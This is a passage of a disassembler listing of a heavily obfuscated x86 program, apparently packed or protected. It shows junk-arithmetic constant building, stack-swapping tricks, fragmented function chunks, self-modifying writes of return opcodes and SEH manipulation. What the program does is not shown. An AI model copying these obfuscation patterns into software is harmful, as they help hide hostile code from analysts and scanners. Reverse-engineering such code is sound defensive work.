		add	ecx, 0E4F69725h
		xchg	ecx, [esp+0]
		jmp	loc_44DABA
; END OF FUNCTION CHUNK	FOR sub_440D6A
; ---------------------------------------------------------------------------

loc_4517AB:				; CODE XREF: k2vbe3.d:00447345j
					; k2vbe3.d:00458350j
		rol	ebp, 5

; =============== S U B	R O U T	I N E =======================================



sub_4517AE	proc near		; CODE XREF: sub_456C5F:loc_443D74p

; FUNCTION CHUNK AT 0044E089 SIZE 0000002B BYTES
; FUNCTION CHUNK AT 004526EA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459EA0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B6B1 SIZE 0000000E BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp+0]
		call	sub_44E481
		jmp	loc_4526EA
sub_4517AE	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446CCF

loc_4517C2:				; CODE XREF: sub_446CCF:loc_44CF0Fj
		mov	byte ptr [eax],	6Ch
		inc	dword ptr [ebp-20h]
		mov	eax, [ebp-20h]
		mov	byte ptr [eax],	6Ch
		inc	dword ptr [ebp-20h]
		jmp	loc_43D154
; END OF FUNCTION CHUNK	FOR sub_446CCF

; =============== S U B	R O U T	I N E =======================================



sub_4517D6	proc near		; DATA XREF: sub_459AEA-5C28o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C7DA SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043F86A SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004430BE SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044EB2F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045126B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B1DE SIZE 0000000B BYTES

		xchg	eax, [esp+0]
		push	eax
		push	0B6F6DF16h
		pop	eax
		or	eax, 4C6E0FAEh
		xor	eax, 0CF90BA78h
		add	eax, 0D2032E74h
		and	eax, 9A7480C1h
		jmp	loc_45B1DE
sub_4517D6	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C27A

loc_4517FD:				; CODE XREF: sub_45C27A:loc_45C285j
		xor	eax, 3344F2B5h
		add	eax, 0D3A8AD22h
		add	eax, ebp
		add	eax, 0F5331Ch
		mov	dword ptr [eax], 6C43776Fh
		push	42377900h
		pop	eax
		or	eax, 0ACDF5E2Ch
		jmp	loc_451F23
; END OF FUNCTION CHUNK	FOR sub_45C27A
; ---------------------------------------------------------------------------

loc_451828:				; CODE XREF: k2vbe3.d:00441A3Fj
		mov	edx, ebx
		pop	ebx
		mov	eax, [esp]
		push	ebx
		mov	ebx, edx
		jmp	loc_451A4C
; ---------------------------------------------------------------------------

loc_451836:				; CODE XREF: k2vbe3.d:004531FBj
		add	esi, 638BAD3Ch
		xchg	esi, [esp]
		jmp	sub_459382
; ---------------------------------------------------------------------------
		or	ebx, ebp
		jmp	loc_44CFBC
; ---------------------------------------------------------------------------

loc_45184B:				; CODE XREF: k2vbe3.d:0043F504j
		jnz	loc_45B5BB
		mov	eax, [esp]
		call	sub_43FF7B

loc_451859:				; CODE XREF: k2vbe3.d:0044D98Aj
		jmp	loc_4495BA
; ---------------------------------------------------------------------------

loc_45185E:				; CODE XREF: k2vbe3.d:0044A27Cj
		jmp	sub_445024
; ---------------------------------------------------------------------------

loc_451863:				; CODE XREF: k2vbe3.d:00454F8Bj
		xchg	ecx, [esi]
		ror	eax, 13h
; START	OF FUNCTION CHUNK FOR sub_449CAB

loc_451868:				; CODE XREF: sub_449CAB:loc_454F78j
		add	ebx, 0D44B0C28h
		push	offset loc_43D680
		jmp	loc_440825
; END OF FUNCTION CHUNK	FOR sub_449CAB
; ---------------------------------------------------------------------------

loc_451878:				; CODE XREF: k2vbe3.d:00453954j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_451879:				; CODE XREF: sub_45A323-8054j
		jmp	loc_44058F
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441DCC

loc_45187E:				; CODE XREF: sub_441DCC+4EA4j
		jmp	loc_43D9F1
; END OF FUNCTION CHUNK	FOR sub_441DCC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FA2C

loc_451883:				; CODE XREF: sub_43FA2C+1C25Cj
		xchg	eax, [esp+0]
		jmp	loc_45BC8E
; END OF FUNCTION CHUNK	FOR sub_43FA2C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441850

loc_45188B:				; CODE XREF: sub_441850+Dj
					; k2vbe3.d:0044FD91j ...
		jz	loc_441862
		xchg	ecx, [esp-4+arg_0]
		mov	edx, ecx
		pop	ecx
		mov	eax, [esp-8+arg_4]
		push	edx
		jmp	loc_454E00
; END OF FUNCTION CHUNK	FOR sub_441850
; ---------------------------------------------------------------------------

loc_4518A0:				; CODE XREF: k2vbe3.d:0043DA3Aj
		ja	loc_44AC8E

; =============== S U B	R O U T	I N E =======================================



sub_4518A6	proc near		; CODE XREF: sub_44E00F+3p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0044057D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044753D SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044C04B SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004547F6 SIZE 00000014 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	edx, ecx
		pop	ecx
		jmp	loc_4547F6
sub_4518A6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	ecx, esi
		jmp	sub_45346B

; =============== S U B	R O U T	I N E =======================================



sub_4518B9	proc near		; CODE XREF: sub_40A36D+17Fp
					; sub_40A36D+2A3p ...
		call	sub_4518D8
		jmp	ds:off_41E078
sub_4518B9	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456C15

loc_4518C4:				; CODE XREF: sub_456C15:loc_458962j
		jmp	nullsub_285
; END OF FUNCTION CHUNK	FOR sub_456C15
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_4518C9:				; CODE XREF: sub_4424CF+8CF9j
		jmp	loc_43F4C1
; END OF FUNCTION CHUNK	FOR sub_4424CF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AA0B

loc_4518CE:				; CODE XREF: sub_45AA0B-10FA2j
		jmp	nullsub_383
; END OF FUNCTION CHUNK	FOR sub_45AA0B
; ---------------------------------------------------------------------------

loc_4518D3:				; CODE XREF: k2vbe3.d:0044312Fj
		jmp	loc_44E6A6

; =============== S U B	R O U T	I N E =======================================



sub_4518D8	proc near		; CODE XREF: sub_43D31B:loc_44EB0Cj
					; sub_4518B9p ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043CDC1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00448A64 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045018D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456F75 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00459E91 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AC96 SIZE 00000018 BYTES

		pop	edx
		jnz	loc_45AC96
		mov	eax, [esp+0]
		call	sub_4530B2

loc_4518E7:				; CODE XREF: sub_4490B2-23E8j
		jmp	nullsub_115
sub_4518D8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_4518EC:				; CODE XREF: sub_447E07-B208j
		jmp	loc_442D64
; END OF FUNCTION CHUNK	FOR sub_447E07
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BDBB

loc_4518F1:				; CODE XREF: sub_44BDBB+10019j
		call	sub_444BC3
; END OF FUNCTION CHUNK	FOR sub_44BDBB
; START	OF FUNCTION CHUNK FOR sub_456471

loc_4518F6:				; CODE XREF: sub_456471:loc_440485j
		add	edx, 0A388FF48h
		or	edx, 148F5B8h
		add	edx, 58C71FB8h
		mov	edx, [edx]
		mov	edx, [edx]
		jmp	loc_43E867
; END OF FUNCTION CHUNK	FOR sub_456471
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF90

loc_451911:				; CODE XREF: sub_43FF90:loc_4595E3j
		xchg	edi, [eax]
		mov	ebx, 55B01F2Ch
		jle	loc_4435FC
		sbb	edx, 5CBF9455h
		jmp	loc_447F5E
; END OF FUNCTION CHUNK	FOR sub_43FF90
; ---------------------------------------------------------------------------
		rol	eax, 7
		jmp	loc_457446
; ---------------------------------------------------------------------------

loc_451931:				; DATA XREF: sub_44866A+5E4o
		cmp	byte ptr [eax],	0F1h
		jnz	loc_43F704
		jmp	loc_44D9EE
; ---------------------------------------------------------------------------

loc_45193F:				; CODE XREF: k2vbe3.d:00450781j
		rol	edi, 0Ah
		popf
		not	esi
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_451945:				; CODE XREF: sub_44921C+7555j
		add	eax, 0E1607811h
		jmp	loc_44284B
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------
		jmp	ds:off_41E01C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_451956:				; CODE XREF: sub_440C94:loc_448E04j
					; sub_455E32+7j
		jmp	loc_44AC7F
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45156D

loc_45195B:				; CODE XREF: k2vbe3.d:loc_43CB06j
					; k2vbe3.d:loc_4445FFj	...
		xchg	edi, [esp-8+arg_4]
		mov	edx, edi
		pop	edi
		jns	loc_45803B
		mov	eax, [esp+0]
		push	edx
		call	sub_44367E
		jmp	loc_453C1A
; END OF FUNCTION CHUNK	FOR sub_45156D
; ---------------------------------------------------------------------------
		and	ebx, 0F83E215Eh
		jmp	loc_447CA0
; ---------------------------------------------------------------------------
		mov	edx, [ebp-18h]
		mov	[edx], eax
		jmp	loc_4586F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_45198A:				; CODE XREF: sub_4424CF:loc_454240j
		mov	eax, [ebp+var_24]
		push	offset loc_45B3DF
		jmp	loc_447476
; END OF FUNCTION CHUNK	FOR sub_4424CF
; ---------------------------------------------------------------------------

loc_451997:				; CODE XREF: k2vbe3.d:loc_44D15Cj
					; k2vbe3.d:0044DBBAj
		sub	ecx, 506EF60Bh
		xor	ecx, 41981AA0h
		add	ecx, 0E4AF0DE5h
		xchg	ecx, [esp]
		jmp	sub_45B20A
; ---------------------------------------------------------------------------
		xor	ebx, 68C1F1AAh
		jmp	loc_444863
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D612

loc_4519BC:				; CODE XREF: sub_43D612:loc_456A7Dj
		xchg	ecx, [esp+4+var_4]
		push	offset sub_454256
		jmp	nullsub_418
; END OF FUNCTION CHUNK	FOR sub_43D612
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_4519C9:				; CODE XREF: sub_43F7AC:loc_45136Cj
		push	3564EF6h
		pop	esi
		or	esi, 8BF77183h
		add	esi, 219C24F0h
		and	esi, 63EB13E9h
		xor	esi, 218300E3h
		test	eax, esi
		jmp	loc_4543A9
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AD42

loc_4519EE:				; CODE XREF: sub_45AD42-114CAj
		rol	ecx, 1Fh
		xor	ecx, 4B6EE906h
		xor	edx, edx
		div	ecx
		mov	[ebp-20h], edx
		jmp	loc_444D9F
; END OF FUNCTION CHUNK	FOR sub_45AD42
; ---------------------------------------------------------------------------

loc_451A03:				; DATA XREF: sub_45530F+3564o
		add	eax, [ebp-4]
		xor	edx, edx
		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp]
		call	sub_453F59
; START	OF FUNCTION CHUNK FOR sub_45451C

loc_451A13:				; CODE XREF: sub_45451C-FB71j
		jmp	loc_452E8E
; END OF FUNCTION CHUNK	FOR sub_45451C
; ---------------------------------------------------------------------------

loc_451A18:				; CODE XREF: k2vbe3.d:00443C90j
		mov	edx, ebx
		pop	ebx
		mov	eax, [esp]
		push	offset sub_454CE9
		jmp	locret_454A38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_451A28:				; CODE XREF: sub_44B912:loc_456561j
		cdq
		jmp	loc_45752B
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442475

loc_451A2E:				; CODE XREF: sub_442475+5F96j
		jz	loc_44E773
		jmp	loc_44C9A4
; END OF FUNCTION CHUNK	FOR sub_442475

; =============== S U B	R O U T	I N E =======================================



sub_451A39	proc near		; CODE XREF: k2vbe3.d:0044614Aj
					; sub_45530F:loc_458E13p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043DFFC SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004473FA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BD6B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FE57 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00458AF0 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0045BAAB SIZE 00000008 BYTES

		xchg	ebx, [esp-4+arg_0]
		pop	ebx
		mov	eax, [esp+0]
		push	edx
		push	eax
		push	0CB09C7FEh
		jmp	loc_44BD6B
sub_451A39	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_451A4C:				; CODE XREF: k2vbe3.d:00451831j
		call	sub_450A7C
; START	OF FUNCTION CHUNK FOR sub_44EF51

loc_451A51:				; CODE XREF: sub_44EF51+Fj
		jz	loc_449CFA
; END OF FUNCTION CHUNK	FOR sub_44EF51
; START	OF FUNCTION CHUNK FOR sub_45C041

loc_451A57:				; CODE XREF: sub_45C041-9A13j
		jmp	loc_448435
; END OF FUNCTION CHUNK	FOR sub_45C041
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CCD8

loc_451A5C:				; CODE XREF: sub_44CCD8+7j
		jmp	loc_4574EA
; END OF FUNCTION CHUNK	FOR sub_44CCD8
; ---------------------------------------------------------------------------
		sbb	edx, 0E2BE8AF4h
		or	edx, 2704CAFEh
		jmp	loc_449CF0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_451A72:				; CODE XREF: sub_44921C:loc_450777j
		push	offset sub_444E9E
		jmp	loc_445FDB
; END OF FUNCTION CHUNK	FOR sub_44921C

; =============== S U B	R O U T	I N E =======================================



sub_451A7C	proc near		; DATA XREF: sub_4518D8:loc_43CDC1o
		add	ecx, 4473F3EBh
		mov	[ecx], eax
		pop	ecx
		lea	eax, sub_4518D8
		mov	byte ptr [eax],	0C3h
		jmp	sub_4518D8
sub_451A7C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45101A

loc_451A93:				; CODE XREF: sub_45101A-26DDj
		or	ebx, 422EF9A7h
		jmp	loc_458F92
; END OF FUNCTION CHUNK	FOR sub_45101A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45451C

loc_451A9E:				; CODE XREF: sub_45451C+3BB0j
		xchg	edx, ebp
		mov	ecx, [edx]
		jmp	loc_444DDD
; END OF FUNCTION CHUNK	FOR sub_45451C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448A7D

loc_451AA7:				; CODE XREF: sub_448A7D+FA55j
		push	2792963Bh
		push	offset loc_44E1D1
		jmp	loc_43F839
; END OF FUNCTION CHUNK	FOR sub_448A7D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451222

loc_451AB6:				; CODE XREF: sub_451222:loc_44AE62j
		xchg	edi, [esp+0]
		mov	edx, eax
		call	sub_45B74D
		push	esi
		push	offset sub_44E5DB
		jmp	nullsub_404
; END OF FUNCTION CHUNK	FOR sub_451222
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_451ACB:				; CODE XREF: sub_446E24+E1BAj
		popf
		add	ebx, 0F2066B13h
		cmp	ebp, 6108B515h
		jmp	loc_454C6B
; END OF FUNCTION CHUNK	FOR sub_446E24
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_470. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_451ADE:				; CODE XREF: k2vbe3.d:004565CFj
		jmp	loc_4487FC
; ---------------------------------------------------------------------------

loc_451AE3:				; CODE XREF: k2vbe3.d:loc_43CB0Bj
		jnz	loc_44D7DD
		jmp	loc_44BD48

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_451AEE	proc near		; CODE XREF: sub_43E0F5j
		push	ebp
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		call	sub_440E8E
sub_451AEE	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_445FE0

loc_451AF9:				; CODE XREF: sub_445FE0+13563j
		jmp	nullsub_319
; END OF FUNCTION CHUNK	FOR sub_445FE0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454CE9

loc_451AFE:				; CODE XREF: sub_454CE9+9j
		jmp	loc_44412F
; END OF FUNCTION CHUNK	FOR sub_454CE9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEBE

loc_451B03:				; CODE XREF: sub_43DEBE+81E9j
		jmp	loc_44EBB1
; END OF FUNCTION CHUNK	FOR sub_43DEBE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_451B08:				; CODE XREF: sub_43CCD0+3D3Dj
		jmp	loc_43EF18
; END OF FUNCTION CHUNK	FOR sub_43CCD0

; =============== S U B	R O U T	I N E =======================================



sub_451B0D	proc near		; DATA XREF: k2vbe3.d:00440C18o
		mov	ds:dword_41E178, eax
		lea	eax, nullsub_4
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_4
sub_451B0D	endp

; ---------------------------------------------------------------------------
		push	esi

loc_451B22:				; CODE XREF: k2vbe3.d:00458FEAj
		push	734AEC80h
		jmp	loc_449194
; ---------------------------------------------------------------------------
		xchg	ecx, [ebp+0]
		jmp	loc_44B475
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F73B

loc_451B34:				; CODE XREF: sub_43F73B+18A97j
		xor	edx, 0B0A401B3h
		sub	edx, 3F53C2CAh
		test	edx, 10h
		jmp	loc_44E344
; END OF FUNCTION CHUNK	FOR sub_43F73B
; ---------------------------------------------------------------------------

loc_451B4B:				; CODE XREF: k2vbe3.d:0044D189j
		push	82C98440h
		ror	eax, 1
		mov	[ebx], ebp
		cmp	eax, edi
		jmp	loc_44B8B3
; ---------------------------------------------------------------------------
		and	eax, 0AB8EC3CEh
		jmp	sub_44987D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C68E

loc_451B66:				; CODE XREF: sub_43C68E:loc_43ED99j
		push	esi
		push	8A60F002h
		pop	esi
		xor	esi, 1975366Ch
		or	esi, 0D4A42778h
		test	esi, 10000h
		jmp	loc_45B210
; END OF FUNCTION CHUNK	FOR sub_43C68E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45890F

loc_451B84:				; CODE XREF: sub_45890F:loc_4522A1j
		jnz	loc_459B0B
		xor	ebx, 651FDA34h
		popf
		jmp	loc_459B05
; END OF FUNCTION CHUNK	FOR sub_45890F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B359

loc_451B96:				; CODE XREF: sub_44B359:loc_441EABj
		xchg	ecx, [esp+0]
		jmp	sub_4599AA
; END OF FUNCTION CHUNK	FOR sub_44B359
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_451B9E:				; CODE XREF: sub_44B2D7+6E07j
		jl	loc_451BC6
		push	ecx
		jmp	loc_4473CB
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------

loc_451BAA:				; CODE XREF: k2vbe3.d:00458767j
		push	offset sub_44F557
		jmp	loc_440480
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4570C0

loc_451BB4:				; CODE XREF: sub_4570C0-B64Aj
		jo	loc_45B98E
		jmp	loc_44914E
; END OF FUNCTION CHUNK	FOR sub_4570C0

; =============== S U B	R O U T	I N E =======================================



sub_451BBF	proc near		; CODE XREF: sub_43F2E0+5DD0j
		push	ebx
		push	0DC603A79h
		pop	ebx
sub_451BBF	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_451BC6:				; CODE XREF: sub_44B2D7:loc_451B9Ej
		rol	ebx, 1Fh
		add	ebx, 11CFE2C4h
		xchg	ebx, [esp+0Ch+var_C]
		lea	eax, [ebp-20h]
		jmp	loc_454F63
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------
		shl	ecx, 10h
		jmp	loc_45A04F
; ---------------------------------------------------------------------------

loc_451BE2:				; DATA XREF: sub_44A679-AD95o
		push	27EF3343h
		xchg	edx, [esp]
		mov	eax, edx
		pop	edx
		rol	eax, 1
		jmp	loc_44ADA8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_187. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FDC1

loc_451BF5:				; CODE XREF: sub_43FDC1+352Dj
		jmp	loc_458F74
; END OF FUNCTION CHUNK	FOR sub_43FDC1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450CBF

loc_451BFA:				; CODE XREF: sub_450CBF-1361Dj
		jmp	nullsub_203
; END OF FUNCTION CHUNK	FOR sub_450CBF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_451BFF:				; CODE XREF: sub_44C90E:loc_454E8Fj
		push	0ACA6C48h
		xchg	esi, [esp+0]
		mov	eax, esi
		pop	esi
		and	eax, 0A7800896h
		xor	eax, 299B9CC6h
		add	eax, 37AA4B29h
		add	eax, ebp
		jmp	loc_446196
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------

loc_451C23:				; CODE XREF: k2vbe3.d:0044387Cj
		ja	loc_45C029

; =============== S U B	R O U T	I N E =======================================



sub_451C29	proc near		; CODE XREF: sub_44921C-59Fp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 004578EF SIZE 00000008 BYTES

		xchg	edi, [esp+0]
		pop	edi
		xchg	eax, [esp-4+arg_0]
		call	sub_43E360

loc_451C35:				; CODE XREF: sub_444966:loc_445EABj
		rol	eax, 1Dh

loc_451C38:				; CODE XREF: k2vbe3.d:0044331Ej
		sub	eax, ds:4000F0h
		add	eax, 323B097Dh
		popf
		jmp	loc_4578EF
sub_451C29	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_451C4A:				; CODE XREF: k2vbe3.d:00444D52j
		retn
; ---------------------------------------------------------------------------

locret_451C4B:				; CODE XREF: k2vbe3.d:0045A19Cj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A4C1

loc_451C4C:				; CODE XREF: sub_45A4C1+12j
		jmp	loc_45495D
; END OF FUNCTION CHUNK	FOR sub_45A4C1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D316

loc_451C51:				; CODE XREF: sub_44D316+7566j
		jmp	loc_44784F
; END OF FUNCTION CHUNK	FOR sub_44D316
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4445E2

loc_451C56:				; CODE XREF: sub_4445E2+5j
		ror	eax, 13h
		push	edx
		mov	edx, ebx
		jmp	loc_448332
; END OF FUNCTION CHUNK	FOR sub_4445E2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_300. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_451C62:				; CODE XREF: k2vbe3.d:0043E9B0j
		jmp	loc_44E3AC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_168. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443940

loc_451C68:				; CODE XREF: sub_443940+5j
		jmp	sub_44B2D7
; END OF FUNCTION CHUNK	FOR sub_443940
; ---------------------------------------------------------------------------

loc_451C6D:				; CODE XREF: k2vbe3.d:0043DDE0j
		push	eax
; START	OF FUNCTION CHUNK FOR sub_45AB7E

loc_451C6E:				; CODE XREF: sub_45AB7E:loc_43DDD3j
		add	eax, 460F1485h
		and	eax, 1C199777h

loc_451C7A:				; CODE XREF: k2vbe3.d:loc_4434E0j
		or	eax, 40A9290Dh
		test	eax, 20000h
		jmp	loc_44799C
; END OF FUNCTION CHUNK	FOR sub_45AB7E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_451C8B:				; CODE XREF: sub_443FC1:loc_4411C5j
		xchg	eax, [esp+0]
		mov	esi, eax
		pop	eax
		lea	eax, loc_44D548
		mov	byte ptr [eax],	0C3h
		jmp	loc_44D548
; ---------------------------------------------------------------------------

loc_451C9F:				; CODE XREF: sub_443FC1+9588j
		mov	eax, [esp-10h+arg_C]
		jmp	loc_454431
; END OF FUNCTION CHUNK	FOR sub_443FC1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C68E

loc_451CA7:				; CODE XREF: sub_43C68E+Dj
		jz	loc_458662
		jmp	loc_446B6F
; END OF FUNCTION CHUNK	FOR sub_43C68E
; ---------------------------------------------------------------------------

loc_451CB2:				; CODE XREF: k2vbe3.d:0043C14Ej
		mov	[edx], eax
		pop	edx
		lea	eax, nullsub_471
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_471

; =============== S U B	R O U T	I N E =======================================



sub_451CC3	proc near		; CODE XREF: sub_41AAD0+27Bp
					; sub_41AAD0+2AFp ...
		call	sub_451CCE
		jmp	ds:off_41E100
sub_451CC3	endp


; =============== S U B	R O U T	I N E =======================================



sub_451CCE	proc near		; CODE XREF: sub_4481FA:loc_43F1A6j
					; sub_44B912:loc_44DF9Dj ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043E537 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045B7B8 SIZE 0000001C BYTES

		jb	loc_43E537
		jmp	loc_45B7B8
sub_451CCE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C224

loc_451CD9:				; CODE XREF: sub_44C224:loc_449FDAj
		mov	[edx], eax
		pop	edx
		pop	ecx
		xor	eax, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_44C224
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452ECC

loc_451CE0:				; CODE XREF: sub_452ECC:loc_452EDEj
		jmp	loc_45BA6C
; END OF FUNCTION CHUNK	FOR sub_452ECC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FCA0

loc_451CE5:				; CODE XREF: sub_43FCA0:loc_448572j
					; sub_449312+5j ...
		pop	large dword ptr	fs:0
		jmp	loc_448C82
; END OF FUNCTION CHUNK	FOR sub_43FCA0

; =============== S U B	R O U T	I N E =======================================



sub_451CF1	proc near		; CODE XREF: sub_44B73E+13p
					; k2vbe3.d:00456E3Aj

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043C58D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043DEAA SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00440358 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00442EEE SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00444111 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004482DC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E9C6 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00450053 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00453D08 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004548D5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457A09 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00457CFB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B014 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045BD5D SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		xchg	edx, [esp-4+arg_0]
		jmp	loc_45B014
sub_451CF1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_451CFD:				; CODE XREF: sub_45A323-1613Bj
		jz	loc_44F69E
; END OF FUNCTION CHUNK	FOR sub_45A323
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_451D03:				; CODE XREF: sub_44921C-A84j
		jmp	loc_45A40B
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44067C

loc_451D08:				; CODE XREF: sub_44067C+377Dj
		jmp	nullsub_1
; END OF FUNCTION CHUNK	FOR sub_44067C
; ---------------------------------------------------------------------------
		pop	eax
		or	eax, ebx
		cmp	ebx, ecx
		jmp	loc_44F2A7
; ---------------------------------------------------------------------------

